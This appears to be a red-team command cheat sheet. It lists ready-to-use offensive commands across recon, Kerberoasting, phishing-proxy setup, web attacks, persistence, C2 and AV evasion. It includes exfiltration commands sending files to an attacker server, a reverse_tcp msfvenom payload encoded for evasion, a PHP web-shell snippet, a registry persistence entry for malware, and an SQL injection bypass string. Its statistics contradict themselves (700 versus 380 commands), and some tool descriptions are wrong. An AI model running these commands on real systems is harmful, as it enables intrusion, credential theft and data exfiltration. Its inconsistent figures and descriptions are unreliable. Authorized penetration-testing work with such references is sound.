The Red Team Arsenal is a comprehensive penetration testing command reference with over 700 commands across 12 major categories. Each command includes:
- MITRE ATT&CK Mappings - Framework alignment for technique classification
- OPSEC Considerations - Operational security implications
- Evasion Techniques - Detection avoidance methods
- Risk Levels - Low, Medium, High, and Critical classifications
- Platform Support - Linux, Windows, and macOS compatibility
Overview & Arsenal Statistics
Key Metrics
| Metric | Value |
|---|---|
| Total Commands | 380 |
| Commands with Examples | 67% (254 Examples) |
| MITRE ATT&CK Mapped | 40% (153 Commands) |
| OPSEC Notes Included | 25% (96 Commands) |
| Evasion Techniques | 93 Techniques |
Risk Level Distribution
| Risk Level | Count |
|---|---|
| Low | 64 |
| Medium | 46 |
| High | 35 |
| Critical | 8 |
Platform Support
| Platform | Commands |
|---|---|
| Linux | 112 |
| Windows | 105 |
| macOS | 82 |
Infrastructure Attacks
Network and system attacks for initial access and enumeration. This category covers reconnaissance, exploitation, privilege escalation, and lateral movement techniques.
Enumeration
Discover and gather information about targets using network reconnaissance tools.
Network Scanning and Discovery
Full Port Scan with Service Detection
nmap -sV -sC -p- {target}
Comprehensive scan of all 65535 TCP ports that identifies open ports, attempts to determine service versions (-sV), and runs the default NSE script set (-sC) against the discovered services.
Network Sweep/Ping Scan
nmap -sn {network_range}
Identifies live hosts on a network without performing port scanning, useful for network mapping and host discovery.
Vulnerability Scanning
nmap --script vuln {target}
Scans for common vulnerabilities using Nmap vulnerability scripts, providing quick assessment of known issues.
ARP-based Host Discovery
netdiscover -r {network_range}
Discovers active hosts on the network using ARP requests, effective for local network enumeration.
SMB Enumeration
Comprehensive SMB Enumeration
enum4linux -a {target}
Enumerates SMB shares, users, groups, and other information on Windows/Samba systems with detailed output.
Anonymous SMB Share Listing
smbclient -L //{target}/ -N
Lists available SMB shares on a target system without requiring authentication.
Advanced Scanning Tools
High-Speed Port Scanning
masscan -p1-65535 {target_range} --rate=1000
Extremely fast port scanner capable of scanning large networks at high rates, useful for large-scale assessments.
Fast Port Scanner with Nmap Integration
rustscan -a {target} -- -sV -sC
Modern Rust-based port scanner with Nmap integration for efficient service detection and enumeration.
Vulnerability Assessment
Template-based Vulnerability Scanning
nuclei -t {template_path} -u {target}
Vulnerability scanner using MITRE ATT&CK templates for comprehensive and organized testing.
LDAP Enumeration
LDAP Directory Enumeration
ldapsearch -x -H ldap://{target} -b "dc={domain},dc={tld}"
Queries LDAP directory for user information, groups, and other Active Directory details.
Exploitation
Metasploit Framework
msfconsole -r {resource_file}
Launches Metasploit Framework console with automated exploitation scripts for rapid vulnerability exploitation.
Exploit Database Search
searchsploit {vulnerability}
Searches the Exploit Database for known public exploits matching the specified vulnerability.
Privilege Escalation (Linux)
Sudo Privileges Enumeration
sudo -l
Lists available sudo commands for the current user, identifying privilege escalation opportunities.
SUID Binary Discovery
find / -perm -4000 2>/dev/null
Identifies SUID binaries that may be exploited for privilege escalation.
Linux Capabilities Enumeration
getcap -r / 2>/dev/null
Identifies binaries with Linux capabilities that can be exploited for privilege escalation.
Process Enumeration
ps aux
Lists all running processes to identify privilege escalation opportunities and running services.
Privilege Escalation (Windows)
User Privileges Display
whoami /all
Displays current user privileges and group memberships for privilege escalation assessment.
Local User Enumeration
Get-LocalUser | Select-Object Name,Enabled
PowerShell command to enumerate local users and their status.
Administrator Group Members
Get-LocalGroupMember -Group "Administrators"
Lists members of the Administrators group for identifying high-value targets.
Pivoting
SSH SOCKS Proxy
ssh -D 1080 {user}@{pivot_host}
Creates SOCKS proxy through SSH for network pivoting and lateral movement.
Chisel Tunneling
chisel client {attacker_ip}:8080 R:socks
Lightweight tunneling tool for network pivoting with SOCKS proxy support.
Phishing Attacks
Email phishing attack techniques and frameworks for social engineering. This section covers infrastructure setup, email configuration, target reconnaissance, and campaign management.
Infrastructure Setup
GoPhish Repository Cloning
git clone https://github.com/gophish/gophish.git
Clones the GoPhish repository for phishing campaign setup and deployment.
GoPhish Compilation
cd gophish && go build
Builds GoPhish from source code for custom deployment.
GoPhish Server Launch
./gophish
Runs GoPhish server with default admin credentials (admin:gophish) for phishing campaign management.
Docker-based GoPhish Deployment
docker run -d -p 3333:3333 -p 8080:80 -p 8443:443 gophish/gophish
Deploys GoPhish using Docker for containerized phishing infrastructure.
Evilginx2 Phishing Proxy
docker run -d --name evilginx2 -p 80:80 -p 443:443 kgretzky/evilginx2
Deploys Evilginx2 phishing proxy for credential harvesting and session hijacking.
Email Configuration
SMTP Email Sending
swaks -t {target_email} -f {sender_email} -s {smtp_server} --body "{message}"
Sends emails through SMTP for phishing campaigns with customizable content.
Target Reconnaissance
Email and Subdomain Harvesting
theHarvester -d {domain} -l 100 -b google
Harvests email addresses and subdomains from public sources for target identification.
Windows Active Directory
Active Directory attacks and exploitation techniques for domain environments. This includes user enumeration, Kerberos attacks, and lateral movement.
User and Computer Enumeration
Active Directory User Enumeration
Get-ADUser -Filter * | Select-Object Name,SamAccountName
Enumerates all Active Directory users with their account names.
Active Directory Group Enumeration
Get-ADGroup -Filter * | Select-Object Name
Lists all Active Directory groups for privilege escalation assessment.
Domain Computer Enumeration
Get-ADComputer -Filter * | Select-Object Name,OperatingSystem
Enumerates domain computers and their operating systems for targeting.
Kerberos Attacks
Kerberoasting - Service Ticket Extraction
GetUserSPNs.py -request {domain}/{user}:{password} -dc-ip {dc_ip}
Requests Kerberos service tickets for offline password cracking.
Kerberoasting Hash Cracking
hashcat -m 13100 {hashes_file} {wordlist}
Cracks Kerberoasting hashes using Hashcat for password recovery.
Lateral Movement
PsExec Remote Command Execution
psexec.py {domain}/{user}:{password}@{target}
Executes commands on remote systems using PsExec for lateral movement.
Cloud Security
Cloud platform security testing techniques for AWS, Azure, and Google Cloud Platform environments.
AWS Enumeration
S3 Bucket Enumeration
aws s3 ls
Lists accessible S3 buckets for identifying cloud storage vulnerabilities.
EC2 Instance Enumeration
aws ec2 describe-instances
Enumerates EC2 instances in the AWS account for targeting and assessment.
Azure Enumeration
Azure Subscription Enumeration
az account list
Lists Azure subscriptions and accounts for cloud infrastructure mapping.
Azure Virtual Machine Enumeration
az vm list --output table
Enumerates virtual machines in Azure for cloud infrastructure assessment.
GCP Enumeration
Google Cloud Platform Instance Enumeration
gcloud compute instances list
Lists Google Cloud Platform instances for cloud infrastructure assessment.
Web Application Attacks
Web application testing techniques and exploitation methods for identifying and exploiting web vulnerabilities.
SQL Injection
Automated SQL Injection Testing
sqlmap -u "{url}" --dbs --batch
Automated SQL injection detection and database enumeration with batch mode.
Web Server Scanning
Web Server Vulnerability Scanning
nikto -h {target}
Web server vulnerability scanner for identifying misconfigurations and vulnerabilities.
Authentication Bypass
SQL Injection Authentication Bypass
' OR '1'='1
SQL injection payload for bypassing authentication mechanisms.
File Upload Vulnerabilities
Web Shell Deployment
php -r 'system($_GET["cmd"]);'
Web shell for command execution through file upload vulnerabilities.
Post-Exploitation
Post-exploitation techniques for maintaining access and data exfiltration after successful compromise.
Persistence Mechanisms
Windows Registry Persistence
reg add HKLM\Software\Microsoft\Windows\Run /v Malware /t REG_SZ /d "C:\path\to\malware.exe"
Creates Windows registry persistence mechanism for maintaining access.
Linux Cron Job Persistence
crontab -e
Edits cron jobs for Linux persistence and scheduled command execution.
Data Exfiltration
HTTP-based Data Exfiltration
curl -X POST -d @{file} http://{attacker_server}/upload
Exfiltrates data via HTTP POST request to attacker-controlled server.
Secure Copy Data Exfiltration
scp {file} {user}@{attacker_ip}:/path/
Secure copy for encrypted data exfiltration over SSH.
Command & Control Frameworks
Command and Control (C2) frameworks for remote access and control of compromised systems.
Metasploit Framework
Metasploit Console Launch
msfconsole
Launches Metasploit Framework console for exploitation and C2 operations.
Cobalt Strike
Cobalt Strike Team Server
./teamserver {ip} {password}
Launches Cobalt Strike team server for advanced C2 operations.
Empire Framework
Empire C2 Framework
python empire
Launches Empire C2 framework for post-exploitation and lateral movement.
Wireless Security
Wireless network security testing techniques for assessing wireless network security posture.
Network Discovery
Wireless Network Discovery
airodump-ng {interface}
Discovers wireless networks and connected clients for wireless assessment.
Packet Capture
Wireless Traffic Capture
tcpdump -i {interface} -w {output_file}
Captures wireless network traffic for analysis and vulnerability identification.
WPA Cracking
WPA/WPA2 Password Cracking
aircrack-ng -w {wordlist} {capture_file}
Cracks WPA/WPA2 passwords from captured handshakes using wordlist attacks.
Mobile Security
Mobile application and device security testing techniques for iOS and Android platforms.
Android Analysis
Android APK Decompilation
apktool d {apk_file}
Decompiles Android APK for source code analysis and vulnerability assessment.
iOS Analysis
iOS Binary Analysis
otool -L {binary}
Analyzes iOS binary dependencies for security assessment.
OSINT & Reconnaissance
Open Source Intelligence gathering and reconnaissance techniques for information collection and target identification.
Domain Enumeration
WHOIS Domain Information
whois {domain}
Retrieves domain registration information including registrant details.
DNS Enumeration
dig {domain} ANY
Performs DNS enumeration to identify DNS records and subdomains.
Subdomain Discovery
Subdomain Enumeration with Subfinder
subfinder -d {domain}
Discovers subdomains using multiple sources for comprehensive domain mapping.
Advanced Subdomain Enumeration
amass enum -d {domain}
Advanced subdomain enumeration with Amass for thorough reconnaissance.
Email Discovery
Email and Subdomain Harvesting
theHarvester -d {domain} -l 100 -b all
Harvests emails and subdomains from all available public sources.
Evasion Techniques
Anti-detection and evasion techniques for avoiding security controls and detection systems.
Payload Obfuscation
Obfuscated Payload Generation
msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -e x86/shikata_ga_nai -i 5 -f exe -o {output}
Generates obfuscated payload with multiple encoding iterations for AV evasion.
Encryption
File Encryption
openssl enc -aes-256-cbc -in {file} -out {encrypted_file}
Encrypts files using AES-256 to avoid detection by security tools.
Process Injection
Legitimate Process Execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(new ActiveXObject('WScript.Shell').Exec('cmd.exe').StdOut.ReadAll());
Executes code through legitimate Windows processes for evasion.
Forensics & DFIR
Digital forensics and incident response techniques for investigating security incidents and analyzing compromised systems.
Memory Forensics
Memory Dump Analysis
volatility -f {memory_dump} imageinfo
Analyzes memory dumps for forensic investigation and malware analysis.
Log Analysis
Log File Searching
grep -r "error" /var/log/
Searches logs for suspicious activity and error messages during incident response.
File Recovery
Deleted File Recovery
photorec -d {output_dir} {image_file}
Recovers deleted files from disk images for forensic investigation.
How to Use This Cheatsheet
- Select a Category - Choose from the major categories based on your testing phase
- Review Techniques - Understand the specific techniques and their MITRE ATT&CK mappings
- Copy Commands - Use the provided commands as templates for your testing
- Customize Parameters - Replace placeholders like {target}, {domain}, etc. with actual values
- Check OPSEC - Review operational security considerations before executing
- Verify Authorization - Always ensure you have proper authorization before testing
WARNING: All techniques and commands in this cheatsheet should only be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. Always ensure proper authorization and follow applicable laws and regulations.